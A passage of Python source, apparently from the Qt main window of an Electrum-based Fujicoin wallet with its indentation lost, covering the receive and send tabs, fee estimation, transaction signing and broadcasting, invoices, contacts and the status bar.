pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Fujicoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Fujicoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Fujicoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Fujicoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Fujicoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
